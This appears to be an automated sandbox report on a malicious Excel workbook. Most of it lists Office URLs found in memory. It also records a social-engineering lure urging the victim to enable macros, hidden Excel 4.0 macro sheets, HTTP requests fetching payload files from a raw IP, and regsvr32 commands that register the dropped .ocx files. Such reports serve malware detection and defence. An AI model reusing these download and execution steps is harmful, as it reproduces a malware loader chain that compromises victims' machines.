Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.coml
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.comlW
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.comn
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.como
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.comx
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://tasks.office.com
Source: EXCEL.EXE String found in binary or memory: https://tellmeservice.osi.office.net
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://tellmeservice.osi.office.netst
Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/F
Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.htmlMe
Source: EXCEL.EXE, 00000001.00000003.622996638.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564819624.000000000F47E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599473071.000000000F47E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754138462.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292418003.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.741498759.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.618708910.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.604793944.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620001254.000000000F47D000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devicest
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://web.microsoftstream.com/video/
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://webshell.suite.office.com
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://webshell.suite.office.comb
Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosgW
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://wus2.contentsync.
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://wus2.pagecontentsync.
Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2Azur
Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://www.odwebp.svc.ms
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://www.odwebp.svc.msC
Source: global traffic HTTP traffic detected: GET /710276824738.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 146.19.170.39Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /710276824738.dat2 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 146.19.170.39Connection: Keep-Alive

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 16 Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 pRoTEcmwARNNG Thisfileorigin
Source: Screenshot number: 16 Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
Source: Screenshot number: 16 Screenshot OCR: Enable Macros ) Why I can not open this document? Shet ' 'I I El m m I i '00% Type here to se
Found Excel 4.0 Macro with suspicious formulas
Source: ClaimCopy-46148734-12012021.xlsb Initial sample: EXEC
Found protected and hidden Excel 4.0 Macro sheet
Source: ClaimCopy-46148734-12012021.xlsb Initial sample: Sheet name: Tiposa1
Source: ClaimCopy-46148734-12012021.xlsb Initial sample: Sheet name: Tiposa
Found a hidden Excel 4.0 Macro sheet
Source: ClaimCopy-46148734-12012021.xlsb Macro extractor: Sheet name: Tiposa1
Source: ClaimCopy-46148734-12012021.xlsb Macro extractor: Sheet name: Tiposa
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: ClaimCopy-46148734-12012021.xlsb ReversingLabs: Detection: 22%
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Volet1.ocx
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Volet2.ocx
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Volet3.ocx
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet4.ocx
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet5.ocx
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet6.ocx
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Volet1.ocx Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Volet2.ocx Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Volet3.ocx Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet4.ocx Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet5.ocx Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet6.ocx Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\{A6C75FAA-30BC-4101-B3BB-4145B71653EC} - OProcSessId.dat Jump to behavior
Source: EXCEL.EXE String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: EXCEL.EXE String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: EXCEL.EXE String found in binary or memory: https://store.office.de/addinstemplate
Source: EXCEL.EXE String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: EXCEL.EXE String found in binary or memory: https://store.office.cn/addinstemplate
Source: EXCEL.EXE String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: EXCEL.EXE String found in binary or memory: https://[OMEX.BaseHost]/api/addins/emailtemplate
Source: EXCEL.EXE String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: EXCEL.EXE String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: EXCEL.EXE String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: EXCEL.EXE String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: EXCEL.EXE String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: EXCEL.EXE String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: classification engine Classification label: mal76.expl.evad.winXLSB@13/6@0/3
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Automated click: OK
Source: C:\Windows\SysWOW64\regsvr32.exe Automated click: OK
Source: C:\Windows\SysWOW64\regsvr32.exe Automated click: OK
Source: C:\Windows\SysWOW64\regsvr32.exe Automated click: OK
Source: C:\Windows\SysWOW64\regsvr32.exe Automated click: OK
Source: C:\Windows\SysWOW64\regsvr32.exe Automated click: OK
Source: C:\Windows\SysWOW64\regsvr32.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: ClaimCopy-46148734-12012021.xlsb Initial sample: OLE zip file path = xl/media/image1.jpg
Source: 26440000.1.dr Initial sample: OLE zip file path = xl/media/image1.jpg
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
